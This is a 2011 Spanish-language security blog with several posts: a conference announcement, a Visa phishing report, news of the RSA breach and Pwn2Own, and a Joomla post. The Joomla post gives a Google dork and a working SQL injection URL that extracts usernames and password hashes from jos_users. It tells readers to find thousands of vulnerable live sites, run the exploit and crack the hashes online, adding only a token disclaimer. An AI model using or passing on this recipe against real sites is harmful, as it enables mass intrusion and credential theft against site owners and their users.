sábado, 30 de abril de 2011

ekoparty Security Conference Argentina edición 2011

Fechas confirmadas directamente de la fuente

Francisco Amato Apr 15 06:51PM -0300 ^

Hola a todos!
Queríamos contarles que están confirmadas las fechas de la ekoparty 2011.Este año la conferencia sera el 21, 22, 23 de Septiembre..... Si, 3 días de conferencia :)
En los próximos días vamos a estar comentando las novedades!!
Los esperamos!
--
Francisco Amato
http://www.linkedin.com/in/famato
http://twitter.com/famato

[ISR] - Infobyte Security Research
Chile 1441 - Segundo Cuerpo - Primer Piso
[C1098ABC] Buenos Aires - Argentina
Tel: +54 11 43837000
http://www.infobytesec.com
http://blog.infobytesec.com


La ekoparty se realiza anualmente en la Ciudad Autónoma de Buenos Aires en donde asistentes, invitados, especialistas y referentes de todo el mundo tienen la oportunidad de involucrarse con innovación tecnológica, vulnerabilidades y herramientas en un ambiente distendido y de intercambio de conocimientos.



“La Conferencia de Seguridad Informática más importante de América Latina.” La idea de realizar un evento con estas particularidades surgió en el circuito underground de IT, pero con el transcurso de las ediciones, logró posicionarse como la conferencia técnica de seguridad mas grande de Latinoamérica. Además de poseer relevancia internacional y contar con una amplia audencia técnica especializada, la ekoparty ofrece entrenamientos, con los profesionales más reconocidos del mercado, actividades paralelas y desafíos.


Organizadores
JUAN PABLO D. BORGNA
Organizador fundador de ekoparty. Propietario de E-MIPS.
LEONARDO PIGNER
Organizador fundador de ekoparty. Propietario de Base4 Security.
FEDERICO KIRSCHBAUM
Organizador fundador de ekoparty. Propietario de Infobyte.
JERÓNIMO BASALDÚA
Organizador fundador de ekoparty. Propietario de Base4 Security.
FRANCISCO AMATO
Organizador fundador de ekoparty. Propietario de Infobyte


“Reunirse y disfrutar de los descubrimientos más importantes en seguridad informática.”
ekoparty Security Conference permite a consultores, oficiales de seguridad, investigadores, programadores, técnicos, administradores de sistemas, nerds y entusiastas de la tecnología, reunirse y disfrutar de los descubrimientos más importantes en seguridad informática.


¿Por quÉ distintos?
Además de brindar un espacio único para el intercambio de conocimientos, la ekoparty provee una serie de actividades, dinámicas y distendidas, relacionadas a lo lúdico y la seguridad informática.


Desafío de Lockpicking;
Wardriving en Buenos Aires;
Wargames;
Zona de relax;
Exposición y actividades relacionadas con el arte digital;
Tiempo para GetTogether;
Promoción de la red Social.

Como ekoparty se caracteriza por sus conferencias y ambiente relajado, brindamos a los asistentes el GetTogether, luego de la primera jornada y un AfterCon Party de cierre al terminar la semana

link: www.ekoparty.org ;)


Comentario: Por donde se puede pasar a buscar la entrada full-free?

miércoles, 27 de abril de 2011

Tipea con la velocidad de un Hacker

Alguna vez se preguntaron como hacen los "hackers" de las peliculas para tipear tan rápido y no equivocarse jamás (nunca borran) ...la respuesta esta aqui



hackertyper.net

Y nada tendrás que envidiarle ni a Neo ni a Trinity ni al flaco de Swordfish ;)

martes, 12 de abril de 2011

Nuevo caso de Phishing de Visa y van...

Hoy entre toda la basura de correo que recibo diariamente, me llamó la atención uno de la tarjeta VISA, (seguro es un caso de phishing me dije yo), luego de analizar los vinculos de las imagenes , etc, parecia de lo mas creible ...hasta que realicé la prueba de fuego, abrir el mail y pasar con el puntero del mouse encima del link sugerido y voilá apareció lo que me temía...la direccion IP a la que apunta el link con el contenido del formulario falso...



por lo que decidi enviarlo al sitio del amigo Cristian Borghello para su archivo y denuncia

a: phishing@segu-info.com.ar

El diseño es muy parecido al de Visa Home pero en realidad se trata de una página diseñada para robar la información. El atacante solicita las credenciales de acceso al portal y los datos de la tarjeta, titular, número, fecha de expiración y códigos de seguridad.

Al hacer clic para acceder se muestra un mensaje de error y luego la víctima es redireccionada al sitio real de Visa Home para realizar el logueo nuevamente. En este punto sus datos ya se encuentran en manos del atacante.-


El sitio real de Visa Home Argentina es: https://inetserv.visa.com.ar/vhs/app/Login.po

Este tipo de ataques, suelen engañar a muchos usuarios. Detectarlos no es complicado.

En primer lugar hay que tener en cuenta que Visa no envía esta clase de mensajes ni solicita información por correo. En cualquier caso, ante la duda lo ideal es llamar al banco.

El texto del mensaje es

Titulo: Aviso
Remitente: Visa Argentina

Visa Home esta constantemente trabajando para su seguridad,
hemos notado una serie de irregularidades en su cuenta en
los últimos días y tuvimos que suspender el acceso a su cuenta temporalmente,
para reactivar su cuenta por favor dirijase a https://inetserv.visa.com.ar/vhs/app/Login.po (Página web falsa exactamente igual a la de Visa)
Y llene los campos necesarios, esto hará que restablezcamos
su cuenta lo antes posible.

Lamentamos las molestias.


Merlina Irigotia,
Departamento Legales,
Visa Argentina.


Comentarios...que se puede decir, cada vez hay mas que quieren obtener dinero de los que lo ganan honestamente...por lo consiguiente hay menos que lo ganan honestamente...

miércoles, 30 de marzo de 2011

El Negocio del Malware




Comentarios: Lo estoy traduciendo al espanish ...

sábado, 19 de marzo de 2011

Sql INjection en Joomla!

Se ha publicado una vulnerabilidad de inyección SQL que afecta a la rama 1.6.0 del popular gestor de contenidos Joomla. El fallo ha sido descubierto por Aung Khant que forma parte de 'YGN Ethical Hacker Group'.

Joomla es un popular gestor de contenidos en código abierto, que cuenta con una gran cantidad de plantillas y componentes que un usuario puedo utilizar para implementar de manera rápida una aplicación web. Estos componentes son programados por todo tipo de desarrolladores. Este hecho, unido a su popularidad, convierten al gestor de contenidos en un objetivo muy popular para que los atacantes.

El fallo fue puesto en conocimiento de Joomla el pasado 24 de enero y tuvo que esperar hasta principios de marzo para que fuera publicada una actualización que solucionase este fallo de seguridad, concretamente la versión 1.6.1. El grupo ha esperado una semana desde la publicación de la actualización para hacer público el fallo, dando este plazo para que los usuarios lleven a cabo la actualización del mismo.

Se ha reportado un nuevo fallo en un componente de joomla, precisamente en com_productshowcase:

DORKS 1 : allinurl:"com_productshowcase"
EXPLOIT :index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*

Tan simple como eso.... ponemos en google la Dork y econtraremos más de 2500 sitios vulnerables. Entonces simplemente nos queda: http:sitiovulnerable.com/EXPLOIT
Luego desencriptamos los passwords con algúnn cracker MD5 de esos que andan por la red... (por ejemplo http://gdataonline.com/seekhash.php
fuente
Tutorial en http://rincondetodo.mforos.com/1783698/9018427-tutorial-inyeccion-sql-en-joomla/


Comentario: Usarlo solo con fines experimentales, El autor del blog no se hace responsable por la interpretación de la información expuesta en el Sitio, ni de su uso indebido, o sea practiquen pero no rompan.- ;)

Hackearon a RSA

La división de seguridad de EMC, RSA, fué comprometida en su seguridad.

Art Coviello, director ejecutivo de RSA, explica en una carta abierta a los clientes de la compañía que sus sistemas de seguridad "identificaron un ciberataque extremadamente sofisticado en progreso" contra RSA. Tras tomar "una variedad de medidas agresivas contra la amenaza", comenzaron "una investigación exhaustiva del ataque". Además, Coviello asegura que están trabajando "con las autoridades apropiadas".

Esta investigación les ha llevado a la conclusión de que el ataque fue una Amenaza Avanzada Persistente. Asimismo, descubrieron que cierta información había sido sustraida.


Parte de la información robada está "específicamente relacionada" con los protocolos de autentificación SecurID de la empresa. Este sistema de seguridad se basa en una doble autentificación. Por un lado, se utiliza una contraseña que conoce el usuario y, por otro lado, una 'llave, un autentificador físico que proporciona una nueva contraseña que se cambia "cada 60 segundos".

Coviello también explica que no tienen pruebas de que ningún otro producto, tanto de RSA como de EMC, haya sido afectado por el ataque. Asimismo, no cree que se haya visto comprometida la información de ningún cliente o trabajador como resultado del ataque.

"Nuestra prioridad es garantizar la seguridad de los clientes y su confianza". Para ello, utilizarán "todos los recursos necesarios" para proporcionar a sus clientes las "herramientas, procesos y soporte" que necesiten para fortalecer la seguridad de sus sistemas.

Según explica Whitfield Diffie, especialista en seguridad informática, al New York Times, la 'master key o llave maestra', un número utilizado en el algoritmo de encriptación, podría haber sido robado.

Si este hubiera sido el caso, explica Diffie, podría utilizarse el código para duplicar las tarjetas y llaves que proporciona RSA, de modo que se podría obtener acceso a las redes y los sistemas informáticos de las empresas.

Comentarios: Si hubiese sido o no el caso es lo mismo, desde el mimo momento en que la empresa fué victima de un ataque, yo creo que ya se plantó la duda acerca de su efectividad como referencia en seguridad, al margen de esto , no debe confundirse este ciberataque a la division RSA con el sistema criptografico de clave pública RSA que lleva su nombre por sus creadores (Rivest, Shamir y Adleman) mas info acerca de este mismo en http://es.wikipedia.org/wiki/RSA .-

viernes, 11 de marzo de 2011

Pwn2Own primer día: Internet Explorer 8 y Safari hackeados

Tiene lugar por estos momentos la CanSecWest en Vancouver (Canadá), una conferencia mas de seguridad de las tantas que hay, igual? No, porque en esta conferencia en particular esta el Pwn2Own, el cual es una competición en la cual los participantes deben "hackear" determinadas aplicaciones, explotando algunas vulnerabilidades de las mismas y en caso de tener exito enviar un informe completo al fabricante para que puede ser parcheado en las proximas versiones, en este año 2011 los actores principales son los navegadores con la salvedad que Google ofrecio un premio al que lograse vulnerar a su naveghador estrella Chrome, si bien hace poco Google lanzo una actualizacion de seguridad para el mismo que corrige 24 vulnerabilidades, se espera que tambien Chrome sea una victima mas del ingenio de los participantes, por ahora ya han caido Internet Explorer 8 corriendo sobre un windows 7 con SP1 y Safari 5.0.3 sobre Mac OS X 10.6.6 .

La firma francesa de seguridad VUPEN que fue la primera en atacar y, en cinco segundos de exposición del navegador a una página cargada de código malicioso, logró ejecutar la calculadora y escribir un archivo en el disco duro del equipo.La siguió Stephen Fewer de Harmony Security que logró ejecutar la calculadora de Windows y escribir en el disco duro del equipo, mediante un ataque que, según este experto en seguridad, tardó cinco semanas en modelar y que explotaba, de manera conjunta, tres vulnerabilidades del navegador.

Hoy la competición se centrará en Firefox y los smartphones (iOS, Android, BlackBerry OS y Windows Phone 7).


Comentario: Yo probé la nueva versión de Chrome, lo que no me gustó fué que me avisó el sistema después que ya estaba instalada en mi equipo, y no antes, es decir "se tomo el atrevimiento" de hacerlo, debo revisar mis configuraciones de seguridad, y si no hubiese sido Chrome? Y si en cambio un troyano? Ojo.-